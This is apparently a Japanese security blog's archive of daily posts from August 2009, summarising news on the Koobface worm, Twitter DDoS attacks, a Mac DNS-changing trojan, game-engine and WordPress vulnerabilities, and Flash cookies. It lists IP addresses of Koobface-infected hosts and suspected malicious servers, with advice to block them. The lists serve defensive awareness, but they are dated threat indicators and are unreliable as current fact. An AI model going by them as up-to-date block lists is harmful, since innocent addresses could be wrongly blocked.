英労働党のウェブサイト内にあった、Gisela_Stuart議員のサイトが（恐らくSQLインジェクションによる）クラックを受け、そのUser名やらパスワードが Googleの検索結果に載ってしまうという事態が発生・・・
現在は復旧しています

Google先生ってやっぱり恐ろしい（笑）

----------
FFユーザはゲーム内メッセージによる詐欺誘導にご注意

釣り

Play Online社が運営するネットワークゲーム Final Fantasy XI でゲーム中に運営のメッセージを装ったフィッシングが発生しているようです。
ネトゲとは縁が薄いなぁ・・
----------
A List Koobface Infection

Harvested(笑) 2009.08.14 CET

129.105.116.185	AS103 (NWUNET) WYOMING Northwestern University
38.96.206.166	AS174 (COGENT) WASHINGTON
70.51.169.72	AS577 (BELLNEXXIA-11) TORONTO
67.225.3.93	AS803 (SASKTEL) SASKATCHEWAN/REGINA
118.100.179.236	AS4788 (TMNET) KUALA LUMPUR
60.49.66.1	AS4788 (TMNET) KUALA LUMPUR
70.196.43.146	AS6167 (CELLCO) NEW JERSEY/BEDMINSTER
140.198.53.45	AS6298 (MARICOPA) ARIZONA/TEMPE
41.248.145.212	AS6713 (IAM-NET) Mauritius
24.34.14.162	AS7015 (CHTR-HSA-1BLK) MASSACHUSETTS/WOBURN(BOSTON)
65.96.155.51	AS7015 (CHTR-HSA-1BLK) MASSACHUSETTS/WOBURN(BOSTON)
75.56.59.116	AS7132 (SBCIS-SIS80) TEXAS Southwestern Bell Internet Services
69.106.249.125
75.60.62.156
70.243.82.142
70.251.54.123
69.106.240.209
70.244.81.145
67.187.123.91	AS7725 (COMCAST) Comcast Cable Communications, Inc.
67.187.21.108	AS7725 (COMCAST) Comcast Cable Communications, Inc.
69.246.248.189	AS7922 (JUMPSTART-4) Comcast Cable Communications, Inc.
69.247.163.202
69.253.157.229
203.223.244.196	AS9304 (POWERCOM) HongKong
24.166.28.31	AS10796 (RRMA) VIRGINIA/HERNDON Road Runner HoldCo, LLC
65.189.136.159
65.25.43.114
65.26.152.244
70.115.225.249	AS11427 (RRSW) VIRGINIA/HERNDON Road Runner HoldCo, LLC
70.121.22.78	AS11427 (RRSW) VIRGINIA/HERNDON Road Runner HoldCo, LLC
71.67.246.106	AS12262 (RRMA) VIRGINIA/HERNDON Road Runner HoldCo, LLC
212.73.53.211	AS12430 (VODAFONE) Vodafone Spain
68.204.133.254	AS13343 (RR-SOUTHEAST-BLK3) VIRGINIA/HERNDON Road Runner HoldCo, LLC
68.206.17.165
69.163.9.125	AS15100 (BEVCOMM-ISP) MINNESOTA/BLUE EARTH Blue Earth Valley Communications, Inc. (BEVCOM)
131.95.218.81	AS16430 (USM) MISSISSIPPI/HATTIESBURG University of Southern Mississippi
24.181.44.48	AS20115 (CHARTER) Saint Louis/Missouri Charter Communications
24.216.237.208
92.40.84.89	AS21327 (H3GUK) London/UK Hutchison 3G UK Limited
201.160.247.82	AS28554 (CABLEMAS) MEXICO/BAJA CALIFORNIA
76.104.78.52	AS33287 (JUMPSTART-5) Comcast Cable Communications, Inc.
71.224.94.241
71.226.129.206
24.12.165.30	AS33491 (COMCAST) Comcast Cable Communications, Inc.
71.201.250.156	AS33491 (COMCAST) Comcast Cable Communications, Inc.
98.227.113.77	AS33662 (JUMPSTART-5) Comcast Cable Communications, Inc.
98.223.59.147
68.46.232.244
68.49.9.3
68.62.166.69

※Comcastの本体は

Yarmouth, NS

----------
今日の遅延の理由（ざんげ）
td rawspan="nnn" とずーーーっと間違えてて悩んでました

EoF

1 Comment »

2009.08.14 金曜日

Posted in security on 8 月 14th, 2009 by gnome

専売特許の日
日本で最初に特許が付与された日に因み制定された記念日。
特許第一号は、1885年8月14日に免許された、堀田瑞松（ほったずいしょう）による「さびどめ塗料とその塗法」である。

パキスタン独立記念日
国旗が無いのはいいことです (まだ悪意ホスティングリストに無い)

----------
Twitterのセキュリティはどうなっている？　相次ぐダウンに疑問の声
ロシアのセキュリティ企業Kaspersky Labのブログでは、Twitterがなぜこうした攻撃に対処できないのかと疑問を投げ掛けた。
Twitterはサービスの人気は高まるばかりだが、セキュリティは年初以来あまり改善されておらず、それほど投資もしていないようにみえると Kasperskyは言い、経営陣はセキュリティへの投資よりも、製品やサービスの強化への投資を優先しているのかもしれないと分析する。
と言うけど、これだけ大規模なBotnetからの集中砲火を浴びて、影響を避けるのは難しいんじゃないでしょうか？どっちかというと、ホスティングしている NTT America のほうに問題があるとかいわれそうですね（苦笑）
もっとも、Twitterの根本的な問題は短縮URLを自動的に組み込んだことで、そのへんのケアがまだうまく機能していないようです。Google Safe Browsingとの連携もあまりうまくいっていません。

関連
Twitter攻撃にロシア政府が関与？　セキュリティ企業は懐疑的
ソーシャルネットワーキングサービスにDDoS攻撃を仕掛けるのは、蚊を退治するのに戦車を持ち出すようなものだと指摘した。

関連？
Twitter-based Botnet Command Channel
While digging around I found a botnet that uses Twitter as its command and control structure. Basically what it does is use the status messages to send out new links to contact, then these contain new commands or executables to download and run. It’s an infostealer operation.
The account in question is under analysis by Twitter’s security team. I spotted it because a bot uses the RSS feed to get the status updates.
64.79.197.110
www2.bancobrasil.com.br

Kasperskyは更に
Twitter and Adobe – what's the difference?
と、手厳しく非難（笑）
最後に書かれていますが、「ビジネス用途で妙なプロダクツを使うな」というのは当たり前の話です・・・が、なかなか遵守できないのも事実ですね。

参考：
PDFリーダー「Foxit Reader」の人気が上昇、7,000万ユーザーを獲得
セキュリティ懸念が原因で企業ユーザーが「Adobe Reader」を敬遠？代替製品に注目

----------
CA eTrust update crashes systems
米時間で水曜日にアップデートされた CA のセキュリティソフト eTrust の、#33.3.7051 アップデートを実行するとクラッシュしてしまうというもの。

33.3.7051 Stdwin32 False Positives
CA eTrust goes nuts with StdWin32 and other false positives
CA eTrust ITM has gone completely nuts today
現在は修正版の定義ファイルが出されていますが、#33.3.7051 定義ファイルのままの人は "on access scanning"を使用せず、定義ファイルの更新を行ってください。

CAは最近トラブル続きですね

----------
AutoCAD malware: ACAD.VLX
CADソフトの定番、AutoCADのファイルを装ったMalwareがまた復活しているようです。
このMalwareは 2007年頃に「流行」したものとは違うタイプのようです。

AutoCAD Malicious Code / Virus Alert “acad.vlx” and Solution

NETで拾ったりメール添付されているファイルを開かないクセをつけましょう（基本）

----------
MS09-043
MS09-043
この件で驚かされるのは、この脆弱性が2年以上前にMicrosoftに報告されたものであるという点だ。

コノ前も似たような話があったような・・

----------
対戦型ゲームに連日の脆弱性

Vietcong 2 Console Output Format String Vulnerability
コンソールの文字列生成に使用された CNS_AddTxt() 関数の文字列フォーマットエラーに関連して、ニックネームに特殊な文字列フォーマットを使用するとサーバーにDOSを仕掛けたり、任意コード実行の可能性があります。
EAから出ている Viercong 1 にはこの脆弱性はありません。

PoC by -- Luigi Auriemma (また Altavista)

参考：
Vietcong 2［英］（2K Games）

----------
Websense's Video -- July Threat
New Video - This Month in the Threat Webscape, July 2009
Youtubeでやってくれるのがいいですよね

一方・・・

2009年8月のワンポイントセキュリティ
小野寺です。
8月のワンポイントセキュリティ情報を公開しました。

事前通知の際にお知らせした通り、今月から、MSNビデオではなく、Silverlightを使用した新しいプレーヤーで提供しています。

----------
隣国から帰国して思ふこと
ところが、隣国のある大手企業では一見協力的なのですが、提出しているPCそのものが偽物だったりします。これは序の口で、従業員情報や勤務情報も虚偽ばかり。さらには人まで偽物でした。（書面上では本物）全てが組織的であり、「ここまでやるか！」と寧ろ感心してしまいました。

隣国ってどっち？（笑）

----------
絶望したっ！
ユーザーが制御できない「秘密cookie」、半数強のサイトが利用

のコメント欄が熱い（苦笑）

一般のひとの反応ってこんな感じなのネ？　と改めて絶望感に浸れました。

あと、孫ソフトバンクさん・・
こんなカテゴリーを作っていいんですか？
トップ > インターネット、PCと家電 > ソフトウェア > ファイル共有、P2P

----------

EoF

Leave A Comment »

2009.08.13 木曜日

Posted in security on 8 月 13th, 2009 by gnome

左利きの日
左利きの生活環境の向上に向けた記念日であり、毎年8月13日がこの記念日。1992年8月13日、イギリスにある「Left-Handers Club」により、右利き用だけでない誰もが安全に使える道具を各種メーカーに対して呼びかけることを目的に提唱・制定された。同日は提唱者の誕生日である。

夜景の日
夜（8）景（トランプのK=13）に由来
函館夜景の日

----------
Apple works hard accordingly machine-gun patch

先日 MacOS X と Safari のパッチを立て続けに出し、ゼロデイのAppleの払拭に頑張っている Apple ですが、更に DNS 関連のパッチを出してきました。

About Security Update 2009-004
A remote attacker may be able to cause the DNS server to unexpectedly terminate
あれれ？ BINDのCVE-2009-0696 ではありませんか？

CVE-2009-0696
The dns_db_findrdataset function in db.c in named in ISC BIND 9.4 before 9.4.3-P3, 9.5 before 9.5.1-P3, and 9.6 before 9.6.1-P1, when configured as a master server, allows remote attackers to cause a denial of service (assertion failure and daemon exit) via an ANY record in the prerequisite section of a crafted dynamic update message, as exploited in the wild in July 2009.
DNS Changerの問題とは関係ないようにも見受けられますが、非公開としている部分もありますのでよくわかりません。
MacOS X サーバ上で、DNS(named)を運用している方は今すぐにパッチを当ててください

Apple Security Update Released for BIND DNS
Apple drops (another) Mac OS X security patch

----------
GEM Engine Flawed

英国 Best Way社が提供する対戦型ゲームエンジンの GEM 2.x に脆弱性があり、悪意をもったサーバに接続するとリモートコード実行の可能性があるとのことです。
PoCが出ていますので、このゲームエンジンを使用したゲームをプレイしている方は注意が必要です。

GEM Engine Multiple Vulnerabilities
PoC -- Luigi Auriemma (す・・すみません Altavistaです・苦笑)

影響を受けるプロダクツ:
Men of War <= Ver 1.11.3 Official Site
Faces of War <= Ver 1.04.1 Official Site (JavaScript過多注意)
V tylu Vraga 2 <= Ver 不明

No fix.

----------
Flashの第三者クッキー

利用者の行動(ビヘイビア)を監視し、よりターゲットを絞った広告に使用するアドウェアがあることはご存知だとは思いますが、一般的な Spyware ブロッカーはその辺をすべてブロックしているはず・・・・？

Blocking those Secret, Stubborn Cookies
a report about the increasing use of flash cookies, using Adobe Flash, that are not affected the privacy controls setup in the web browser.
ウェブブラウザのプライバシーポリシーに制約を受けないFlashのクッキー使用が増えている。

Secret, Stubborn Cookies (August 10, 2009)
UCBのリサーチャーはインターネット上のウェブサイトの半数以上がユーザの行動と興味の対象を調べるために Adobe Flash クッキーを使用していると報告しましたが、これらのクッキーは、他の製品(suites)がその「トラッキング技術」に関して詳細を公開しているにもかかわらず、(Flash Cookiesは)プライバシーに関する４つの規則を遵守していない点について指摘しました。
Flash Cookiesは他の一般的なCookieと違い、ブラウザのプライバシーポリシーの制御を受けません。更には、ユーザが一般的なCookieを削除した後でも、それらのCookieを再利用するために Flash Cookieが使われています。

要するにゾンビクッキー状態なのです。

かなり長いですが元の Wiredの記事は
You Deleted Your Cookies? Think Again
ゾンビの写真入り（笑）

気持ち悪い方は(みんな気持ち悪いはず)
Global Storage Settings panel

サードパーティ製のFlashコンテンツにコンピュータ上のデータを格納する事を許可します
がデフォルトでONになっていますので、OFFにしてください。

Firefoxの方は
BetterPrivacy (1.29)
のようなアドオンできちんとCookie管理をしたほうがよさそうです。

----------
2Wire

2Wire 2071 Gateway
2Wire 1800HW
2Wire 1701HG

この辺に見覚えのある方は
2WIRE（あるいは代理店）に確認を取ることをお勧めします。

パスワードをリセットさせられるという PoC が出ています。

----------
Microsoft (Fake) AV Collection

Win32/FakeRean and MSRT

すっかりコーナー化した、偽セキュソフトの画面コレクションです。

----------
Twitter DOWN again

Twitter、サイバー攻撃で再びダウン
ロシア政府が反政府的ブロガーを狙って仕掛けた攻撃ではないかとの説もある。
こんな出所不明なこと書いていいのかしらん（笑）

----------
Botの名前解決

THEPLANET ですからねぇ・・

72.167.49.117
69.162.84.186
216.245.213.194
74.53.240.82 (THEPLANET)

----------

『マウスパッド投げ世界大会2009』開催。

御影石のマウス投げは危険すぎる・・・
（あと、人に見せられないほど怪しいマウスパッドもやめましょうね・・・）

EoF

Leave A Comment »

2009.08.12 水曜日

Posted in security on 8 月 12th, 2009 by gnome

君が代記念日
う・・うちは政治ネタは禁止デス（笑）
茜雲忌(航空安全の日)
日本航空123便墜落事故 (JAL123便墜落までの記録)
ご冥福をお祈りいたします

クレオパトラ7世の命日

----------
[WARNING]
WordpressのAdminパスワードが意図せずにリセットされてしまう危険性

Wordpress unauthenticated administrator password reset

これは PHPの、「データのセットされていない空の連想配列をセットできてしまう」ことを悪用したもので、現時点での回避策はありません。

既に修正がCommitされていますので、じきに改訂版がリリースされるでしょう。

Password-reset flaw haunts WordPress admins

----------
[UPDATE]
Safari 4.0.3
This update is recommended for all Safari users and includes improvements to stability, compatibility and security including:

Stability improvements for webpages that use the HTML 5 video tag
Stability improvements for 3rd-party plug-ins
Stability improvements for Top Sites
Fixes an issue that prevented some users from logging into iWork.com
Fixes an issue that could cause web content to be displayed in greyscale instead of color

About the security content of Safari 4.0.3

CVE:

CVE-2009-2468

CVE-2009-2188

CVE-2009-2196(*reserved*)

CVE-2009-2195(*reserved*)

CVE-2009-2200(*reserved*)

CVE-2009-2199(*reserved*)

使用中の方はUPDATEしましょう。

----------
Mac OS X DNS-Changer

Mac OS X DNS-Changing Trojan in the Wild
ネームサービスを不正に変更するトロイの木馬が発見されました。このトロイの木馬は MacOS Xを標的にしており、３月頃はMacCinema Installer という名前で出回っていました。
今回は QuickTimeUpdate.dmg というファイルで QuickTime Player のアップデートを装っています。実行されると正規なドメインを悪意サーバに導き、貴方のインターネットトラフィックを監視されるようになります。

以下のIPアドレスは自信無いけど塞いでおきましょう（誤射かも！？）
85.255.112.81
85.255.112.91
85.255.112.114
85.255.112.233
(or 85.255.112.0/24)

91.214.45.73
94.247.2.109
78.157.142.187
213.163.64.78

New Mac OS X DNS changer spreads through social engineering

Latest Mac Threat: ‘MacCinema’ -- 2009.03.23

Latest Threat: MacCinema -- 2009.03.17

OS X Tips: How To Check Your DNS Settings -- 2009.06.10

Mac環境も安全ではなくなりつつあります。

----------

EoF

Leave A Comment »

2009.08.07 FRI

Posted in Trouble, security on 8 月 7th, 2009 by gnome

七夕（月遅れ）

花の日鼻の日バナナの日
いずれもゴロあわせですね・・・

----------
Twitter DOWN

Twitter DOS
Twitter seems be under a Denial of Service right now.
Facebook was down at the same time.

Site is down Ongoing denial-of-service attack
Update: we are defending against a denial-of-service attack.
Ongoing denial-of-service attack
Update: the site is back up, but we are continuing to defend against and recover from this attack.
Update (9:46a): As we recover, users will experience some longer load times and slowness. This includes timeouts to API clients. We’re working to get back to 100% as quickly as we can.

Twitterが大規模なDDoSを受け、ダウンしていた模様です。現在は復帰しているものの依然として接続しにくい状態になっています。
災害時の輻輳状態と同じですが、つながりにくいからといって何度もリトライを繰り返すユーザと、Botnetの攻撃が相乗効果となり更に悪い結果を導き出してしまいます。
Twitter knocked offline by DDoS attack; Koobface returns with a twist
TwitterがDDoS攻撃でオフラインに、新型Koobfaceも出回る
ZDnetに寄稿している Kaspersky Lab. のアナリスト、Stefan Tanase氏は SNSをターゲットにしたWorm型Botnetである Koobface に「新顔」が登場し、同時に発生したDDoSであるとしています。
New tricks for Koobface

バイナリの挙動
Net-Worm.Win32.Koobface.d -- 5 August 2009, 14:44:53

Net-Worm.Win32.Koobface.d -- 27 July 2009, 15:20:53

MalURL:
uppinorr.se
212.97.132.134 AS9120 Cohaesio A/S
：MDL/MalListともに無し

同一IPに収容されているドメイン群

2get.dk	0	THROUGH
alt.dk	NOT YET	THROUGH
anetteegelund.dk	NOT YET	THROUGH
asmul.com	0	THROUGH
billigalinser.org	NOT YET	THROUGH
bronsby.dk	0	THROUGH
bygherre.dk	NOT YET	THROUGH
cambro.dk	NOT YET	THROUGH
camischa.dk	NOT YET	THROUGH
capsa.dk	NOT YET	THROUGH
cavesmathias.com	NOT YET	THROUGH
dale.se	NOT YET	THROUGH
drengekoret.dk	NOT YET	THROUGH
ebd.nu	NOT YET	THROUGH
embygg.com	NOT YET	THROUGH
eurobase.se	NOT YET	THROUGH
frigaard.info	NOT YET	THROUGH
gel.se	NOT YET	THROUGH
glx.dk	0	THROUGH
great-vikings.dk	0	THROUGH
host.masterminds.dk	NOT YET	THROUGH
http3a2f2fwww.schacksnack.se	NOT YET	THROUGH
idealpromotion.dk	NOT YET	THROUGH
karval.nu	NOT YET	THROUGH
kauffmann.se	NOT YET	THROUGH
klovnfisken.dk	NOT YET	THROUGH
lahdk.se	NOT YET	THROUGH
lanklagret.com	NOT YET	THROUGH
lautrupgaard.dk	NOT YET	THROUGH
lerumskammarkor.se	NOT YET	THROUGH
lexter.se	NOT YET	THROUGH
luxsit.se	NOT YET	THROUGH
mail2.luxsit.se	NOT YET	THROUGH
maildefer.trollvippans.com	NOT YET	THROUGH
mailspool.trollvippans.com	NOT YET	THROUGH
masterminds.dk	NOT YET	THROUGH
mexicanway.com	NOT YET	THROUGH
mrzane.com	NOT YET	THROUGH
mx1.jjbag.com	NOT YET	THROUGH
mx2.jjbag.com	NOT YET	THROUGH
n66.se	NOT YET	THROUGH
netrod.dk	NOT YET	THROUGH
otto-fogemann.dk	NOT YET	THROUGH
rekordbog.dk	NOT YET	THROUGH
respublica.se	NOT YET	THROUGH
rugtved.net	NOT YET	THROUGH
scandinavianshowgirls.com	NOT YET	THROUGH
sextop.dk	NOT YET	THROUGH
skivetennisklub.dk	NOT YET	THROUGH
skivevolley.dk	NOT YET	THROUGH
spinoria.com	NOT YET	THROUGH
thylander.dk	NOT YET	THROUGH
trollvippans.com	NOT YET	THROUGH
usefullthings.com	NOT YET	THROUGH
weconsult.se	0	THROUGH
ws34.surf-town.net	NOT YET	THROUGH
www.anetteegelund.dk	NOT YET	THROUGH
www.bronsby.dk	0	THROUGH
www.bygherre.dk	NOT YET	THROUGH
www.cambro.dk	NOT YET	THROUGH
www.camischa.dk	NOT YET	THROUGH
www.canalstreet.nu	NOT YET	THROUGH
www.drengekoret.dk	NOT YET	THROUGH
www.frigaard.info	NOT YET	THROUGH
www.geist.nu	NOT YET	THROUGH
www.glx.dk	NOT YET	THROUGH
www.great-vikings.dk	0	THROUGH
www.jobogpenge.dk	NOT YET	THROUGH
www.karval.nu	NOT YET	THROUGH
www.kauffmann.se	NOT YET	THROUGH
www.klovnfisken.dk	NOT YET	THROUGH
www.lautrupgaard.dk	NOT YET	THROUGH
www.lerumskammarkor.se	NOT YET	THROUGH
www.rekordbog.dk	NOT YET	THROUGH
www.skivetennisklub.dk	NOT YET	THROUGH
www.skivevolley.dk	NOT YET	THROUGH
www.weconsult.se	0	THROUGH
www.zmanga.se	NOT YET	THROUGH
zmanga.se	0	THROUGH

全部するーですか！？

参照：

The Real Face of KOOBFACE

参考；

Twitter Chooses NTT America Enterprise Hosting Services
NTT America のホスティングなんですね

----------
Microsoft Monthly Patch 8/11(8/12-JST)

Microsoft Security Bulletin Advance Notification for August 2009

緊急 x 5 に重要 x 4 ですね

Microsoft Releases Advance Notification for August Security Bulletin

August 2009 Advance Notification

----------
SymantecがVirusTotalを語る・・

Looks suspicious check in Virustotal.com
VirusTotal is not substitute any antivirus software installed in a PC, as it only scans individual files on demand. It does not offer permanent protection for the user's system either.
Although the detection rate afforded by the use of multiple antivirus engines is far superior to that offered by just one product, these results DO NOT guarantee the harmlessness of a file.
Currently, there is not any solution that offers a 100% effectiveness rate for detecting viruses and Malware. You may become a victim of misleading advertising, if you buy such a product under those premises.
Sometimes no Antivirus Company will detect it since it will be a new threat that nobody knows about so it even Virus Total is not 100% reliable service. But still it is used by most of the Administrators and Organizations around the world.

VirusTotalは提供された個々のファイルをスキャンするだけであって、PCに入っているアンチウィルスソフトの代用になるものではありません（あたりまえだ）。それはユーザのシステムに対して恒久的な保護を提供しません。（だから VT はそういうもんじゃないでしょ？）
複数のアンチウィルス・エンジンによって検出された結果は、たった１社のプロダクツによって提供されるものよりも遥かに優れていますが、これらの結果がそのファイルの無害を保障するわけではありません。
現在、ウィルスとマルウェアを100%検出できるソリューションなど存在しないのです（アタリマエダ）。もしそのような誇大広告によってミスリーディングした製品を買ってしまうならあなたは犠牲者となってしまうでしょう。

誰も知らないような新しい脅威が発生し、アンチウィルス会社が全く検出できないような状況がしばしば発生し、そうしたときは VTの結果もまた 100% の信頼できるものではありません。しかしそれでも、それは世界中のアドミンと組織によって使用され続けています。

何が言いたいのかよくわからない・・・
誰か解説してください（笑）

----------

ウイルス対策をやりたがらない知人を説得するには？
お、おれのことかー部門より

/.ユーザでも、意外と多いのかな・・

IE6の乗り換えを促す「IE6 No More」キャンペーン始まるIE6の乗り換えを促す「IE6 No More」キャンペーン始まる

IE6 No More
たまには Operaのことも思い出してあげてください・・・・

----------
EoF

2 Comments »

2009.11.24 火曜日

2009.11.19 解禁日

2009.10.27 火曜日（たぶん）縮刷版

2009.10.09 金曜日

[Notice] 8080 インジェクション陥落サイトが日本国内で確認

2009.08.15 土曜日

2009.08.14 金曜日

2009.08.13 木曜日

2009.08.12 水曜日

2009.08.07 FRI

転ばぬ先の杖

Gravestone

FFFTP作者 SOTA様へのお詫び

最近の投稿

最近のコメント

カテゴリー

メタ情報

アーカイブ

2012 年 2 月
月	火	水	木	金	土	日
« 4 月
		1	2	3	4	5
6	7	8	9	10	11	12
13	14	15	16	17	18	19
20	21	22	23	24	25	26
27	28	29